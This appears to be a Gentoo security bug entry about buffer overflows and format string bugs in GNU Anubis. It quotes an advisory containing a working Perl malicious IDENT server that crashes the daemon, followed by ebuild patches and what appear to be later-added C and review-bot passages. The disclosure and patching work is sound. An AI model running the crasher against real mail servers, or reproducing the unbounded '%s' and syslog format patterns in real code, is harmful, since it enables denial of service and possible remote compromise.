Bug 43764 - GNU Anubis buffer overflows and format string bugs
Summary: GNU Anubis buffer overflows and format string bugs
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
Importance: High normal
Assignee: Gentoo Security
Reported: 2004-03-04 18:48 UTC by Dave Monnier
Modified: 2011-10-30 22:40 UTC (History)


Attachments
anubis-3.6.2 patch (anubis-3.6.2-securityfixes.patch, 3.97 KB, application/octet-stream)
  2004-03-04 18:52 UTC, Dave Monnier
ebuild patch to resolve the vulnerability. (anubis-3.6.2-r1.ebuild-patch, 364 bytes, patch)
  2004-03-11 22:55 UTC, Dave Monnier

Description Dave Monnier 2004-03-04 18:48:42 UTC
Message-Id: <1078427980.4047814c1dfe5@webmail.uu.se>
Date: Thu,  4 Mar 2004 20:19:40 +0100
From: Ulf Härnhammar <Ulf.Harnhammar.9485@student.uu.se>
Reply-To: ulf.harnhammar.9485@student.uu.se
To: bugtraq@securityfocus.com
Cc: full-disclosure@lists.netsys.com
Subject: GNU Anubis buffer overflows and format string bugs

GNU Anubis buffer overflows and format string bugs


PROGRAM: GNU Anubis
VENDOR: Free Software Foundation, Inc.
HOMEPAGE: http://www.gnu.org/software/anubis/
VULNERABLE VERSIONS: 3.6.2, 3.9.93, 3.9.92, 3.6.0, 3.6.1,
                     possibly others
IMMUNE VERSIONS: 3.6.2 with vendor patch, 3.9.93 with vendor patch,
                 latest CVS
REFERENCES: not yet


* DESCRIPTION *


"GNU Anubis is an outgoing mail processor. It goes between the MUA
(Mail User Agent) and the MTA (Mail Transport Agent), and can perform
various sorts of processing and conversion on-the-fly in accordance
with the sender's specified rules, based on a highly configurable
regular expressions system. It operates as a proxy server, and can
edit outgoing mail headers, encrypt or sign mail with the GnuPG,
build secure SMTP tunnels using the TLS/SSL encryption even if your
mail user agent doesn't support it, or tunnel a connection through
a SOCKS proxy server."

(quoted from freshmeat.net)


* SUMMARY *


I have found two buffer overflows and three format string bugs
in GNU Anubis. They can all be remotely exploited, potentially to
get root access, as GNU Anubis usually runs as root and drops its
privileges after executing some of the vulnerable functions.


* TECHNICAL DETAILS *


a) There are two buffer overflows in the function auth_ident()
in auth.c. The overflows are caused by sscanf() format strings of
the type "%s" instead of "%63s".

b) There are format string bugs in three instances of the syslog()
call. They are located in the function info() in log.c, the
function anubis_error() in errs.c and the function ssl_error()
in ssl.c. The vulnerable functions take strings partially made up
of user-supplied data, and use them as the format string instead
of using them as parameters ('syslog(priority, string);' instead
of 'syslog(priority, "%s", string);'). These format string bugs
become a bigger problem if you set termlevel to VERBOSE or DEBUG,
as GNU Anubis then will log more data with the syslog() facility.


* SOLUTION *


The vendor has released official security patches for 3.6.2 and
3.9.93. They can be downloaded from the program's homepage. They
correct both the buffer overflows and the format string bugs.


* MALICIOUS IDENT SERVER *


One of the methods of attacking GNU Anubis is through IDENT data,
as it always connects to the client's IDENT server to get more
information about the client. I wrote a simple malicious IDENT
server in Perl. It crashes the current instance of GNU Anubis, either
by using the buffer overflows or by using the format string bugs.
Here it is:


#!/usr/bin/perl --

# anubis-crasher
# Ulf Harnhammar 2004
# I hereby place this program in the Public Domain.

use IO::Socket;


sub usage()
{
  die "usage: $0 type\n".
      "type is 'a' (buffer overflow) or 'b' (format string bug).\n";
} # sub usage


$port = 113;   # IDENT (RFC 1413) port that GNU Anubis connects back to

usage() unless @ARGV == 1;
$type = shift;
usage() unless $type =~ m|^[ab]$|;

# 'a': 400 bytes into a field read with an unbounded "%s" (overflow)
# 'b': 28 "%n" directives for the syslog() calls that use the reply
#      text as their format string
$send{'a'} = 'U' x 400;
$send{'b'} = '%n' x 28;
$sendstr = $send{$type};

$server = IO::Socket::INET->new(Proto => 'tcp',
                                LocalPort => $port,
                                Listen => SOMAXCONN,
                                Reuse => 1) or
          die "can't create server: $!";

while ($client = $server->accept())
{
  $client->autoflush(1);
  print "got a connection\n";

  # Anubis sends "<port>, <port>" as its IDENT query; strip CR/LF
  $input = <$client>;
  $input =~ tr/\015\012//d;
  print "client said $input\n";

#  $wait = <STDIN>;
#  $wait = 'be quiet, perl -wc';

  # IDENT-style USERID reply carrying the chosen payload as the user name
  $output = "a: USERID: a:$sendstr";
  print $client "$output\n";
  print "I said $output\n";

  close $client;
  print "disconnected\n";
} # while client=server->accept

__END__


* 31337 IRC KIDDIES *


K: "w0w d00d m0r3 buphph3r 0v3rphl0wzZz 4nd ph0rm4t zZztr1ngzZz!!1!
but why d0 y4 p0zZzt 4b0ut th4t xss ph1lt3r??+??+? w3 1n 'h4ck3rzZz
phr0m h3ll' r n0t 4muzZz3d!! xss 1zZzn't r34lly 4 vuln3r4b1l1ty
c0z 1t'zZz 34zZzy t0 3xpl01t th4t vuln3r4b1l1ty 4nd th3n u c4n't
pr00v3 h0w 31337 u r!!! th3 n31ghb0ur'zZz d4ught3r 1zZz r34lly
cut3 4nd 1ph 1 ph1nd l0tzZz 0ph buphph3r 0v3rphl0wzZz zZzh3'll b3
1mpr3zZzZzZ3d 4nd g0 t0 th3 m0v13zZz w1th m3 but th4t w0n't h4pp3n
1ph 1 ph1nd xss h0l3zZz!!!!11!!!1!!11!!!!"

U: "Virgin."

(Anyone on IRC who doesn't behave like K here is of course OK.)


// Ulf Harnhammar
   kses - 31337 PHP HTML/XHTML filter (no XSS)
   http://sourceforge.net/projects/kses




Reproducible: Always
A patch is mentioned in the advisory, will get it added here.
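The two bug classes in sections (a) and (b) of the advisory above, as an added example in C that is not code from GNU Anubis or from the advisory: an IDENT-reply parser in the vulnerable "%s" form beside the hardened "%63s" form, and the syslog() fix applied through snprintf() so its effect can be checked offline. The function names, the 64-byte field size, the RFC 1413 reply layout and the sample replies (including the crasher's 400-byte and '%n' x 28 payloads) are assumptions made for the illustration; the real auth.c, log.c, errs.c and ssl.c are laid out differently.

```c
/*
 * Added example, not GNU Anubis code.  Shows the two bug classes from
 * the advisory as the vulnerable pattern beside a hardened one.  The
 * function names, the 64-byte field size, the IDENT reply layout
 * (RFC 1413 style) and the sample replies are assumptions for this
 * illustration; the real auth.c and log.c are laid out differently.
 */
#include <stdio.h>
#include <string.h>

#define IDENT_FIELD 64            /* assumed per-field buffer size */

struct ident_info {
    char os[IDENT_FIELD];
    char user[IDENT_FIELD];
};

/* (a) VULNERABLE: "%s" carries no width, so an IDENT server that
 * answers with a 400-byte user name (the crasher's 'a' mode) writes
 * past the end of info->user.  Kept for comparison only; never call
 * it on data read from the network. */
int parse_ident_unsafe(const char *reply, struct ident_info *info)
{
    return sscanf(reply, "%*d , %*d : USERID : %s : %s",
                  info->os, info->user);
}

/* (a) HARDENED: "%63s" bounds each field to sizeof-1 bytes and sscanf
 * NUL-terminates it.  A field that fills its buffer completely was
 * most likely truncated, so such a reply is rejected instead of being
 * acted on.  Returns 1 on success, 0 on a malformed or overlong reply. */
int parse_ident_safe(const char *reply, struct ident_info *info)
{
    memset(info, 0, sizeof *info);
    if (sscanf(reply, "%*d , %*d : USERID : %63s : %63s",
               info->os, info->user) != 2)
        return 0;
    if (strlen(info->os) >= IDENT_FIELD - 1 ||
        strlen(info->user) >= IDENT_FIELD - 1)
        return 0;
    return 1;
}

/* (b) The format string bug and its fix, exactly as the advisory puts it:
 *
 *     syslog(priority, string);        VULNERABLE: string is the format
 *     syslog(priority, "%s", string);  FIXED: string is only an argument
 *
 * render_log_line() applies the fixed form to a buffer (snprintf uses
 * the same format machinery as syslog) so the effect can be checked:
 * whatever the attacker sent is copied verbatim and never interpreted.
 * Returns the number of bytes snprintf would have written. */
int render_log_line(char *out, size_t outsz, const char *user_text)
{
    return snprintf(out, outsz, "%s", user_text);
}

/* Count the conversion directives an attacker-supplied string would
 * trigger if it were (mis)used as a format.  "%%" is a literal percent
 * sign and is not counted. */
int count_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {     /* escaped percent, skip both */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    struct ident_info info;
    char line[128];
    int ok;

    /* Constructed IDENT replies: one benign, one carrying the crasher's
     * 400-byte user field (mode 'a'). */
    const char *good = "6191, 23 : USERID : UNIX : alice";
    char evil[512] = "6191, 23 : USERID : UNIX : ";
    size_t p = strlen(evil);
    memset(evil + p, 'U', 400);
    evil[p + 400] = '\0';

    ok = parse_ident_safe(good, &info);
    printf("good reply parsed: %d (user=%s)\n", ok, info.user);
    printf("evil reply parsed: %d\n", parse_ident_safe(evil, &info));

    /* Constructed format payload: the crasher's mode 'b' ('%n' x 28). */
    const char *payload =
        "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n";
    render_log_line(line, sizeof line, payload);
    printf("%d directives, logged verbatim: %s\n",
           count_directives(payload), line);
    return 0;
}
```

Building with -Wformat-security makes gcc flag the vulnerable syslog(priority, string) form quoted in the comment, which is the quickest way to locate the three calls the advisory names. Note that a width on sscanf only truncates silently; that is why parse_ident_safe() also rejects a field that filled its buffer rather than continuing with a mangled user name.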
Comment 1 Dave Monnier 2004-03-04 18:52:27 UTC
Created attachment 26872
anubis-3.6.2 patch

http://savannah.gnu.org/patch/?func=detailitem&item_id=2699
Comment 2 Dave Monnier 2004-03-10 10:56:35 UTC
Remote exploit published.

http://www.securityfocus.com/archive/1/356928

If there's no one maintaining this I'll get the ebuild updated as soon as I can.

-Dave
Comment 3 Dave Monnier 2004-03-11 22:55:51 UTC
Created attachment 27231
ebuild patch to resolve the vulnerability.

--- /usr/portage/net-mail/anubis/anubis-3.6.2.ebuild	2003-09-05
04:08:59.0000
00000 -0500
+++ /usr/local/portage/net-mail/anubis/anubis-3.6.2.ebuild	2004-03-12
01:34
:08.894638904 -0500
@@ -19,6 +19,12 @@

 S=${WORKDIR}/${P}

+src_unpack() {
+	 unpack ${P}.tar.gz
+
+	 epatch ${FILESDIR}/${P}-securityfixes.patch
+}
+
 src_compile() {
	local myconf
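Review bot: epatch is provided by eutils.eclass, and neither this hunk nor the full ebuild pasted in comment 4 shows an `inherit eutils` line, so the new src_unpack() will die with an unknown-command error before the fix is applied unless that inherit is present in the header the paste omits; add it (or confirm it). Two smaller points on the same hunk: it assumes ${FILESDIR}/${P}-securityfixes.patch already exists, so attachment 26872 has to be committed under files/ in the same change, and `unpack ${A}` is the conventional form since ${A} is exactly the SRC_URI tarball set. Finally, the diff header targets anubis-3.6.2.ebuild in place; an installed 3.6.2 gets no upgrade from that, so land it as anubis-3.6.2-r1.ebuild as comment 4 does.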
Comment 4 Dave Monnier 2004-03-13 09:38:18 UTC
anubis-3.6.2-r1.ebuild
======================

DESCRIPTION="GNU Anubis is an outgoing mail processor."
HOMEPAGE="http://www.gnu.org/software/anubis/"
SRC_URI="mirror://gnu/anubis/${P}.tar.gz"
LICENSE="GPL-2"

SLOT="0"
KEYWORDS="x86"
IUSE="ssl pam tcpd crypt"

DEPEND="crypt? ( >=app-crypt/gpgme-0.3.13 )
        ssl?   ( >=dev-libs/openssl-0.9.6 )
        pam?   ( >=sys-libs/pam-0.75 )
        tcpd?  ( >=sys-apps/tcp-wrappers-7.6 )
                 >=dev-libs/libpcre-3.9"

S=${WORKDIR}/${P}

src_unpack() {
        unpack ${P}.tar.gz

        epatch ${FILESDIR}/${P}-securityfixes.patch
}

src_compile() {
        local myconf

        myconf="--with-pcre"

        use crypt || myconf="${myconf} --without-gpgme"
        use ssl  && myconf="${myconf} --with-openssl"
        use pam  && myconf="${myconf} --with-pam"
        use tcpd && myconf="${myconf} --with-tcp-wrappers"

        ./configure ${myconf} --prefix=/usr --host=${CHOST} || die
        emake || die
}

src_install() {
        einstall
}
Comment 5 Lisa Seelye (RETIRED) gentoo-dev 2004-03-15 18:35:27 UTC
Fixed in cvs as 3.6.2-r1. blame cshields for breakage.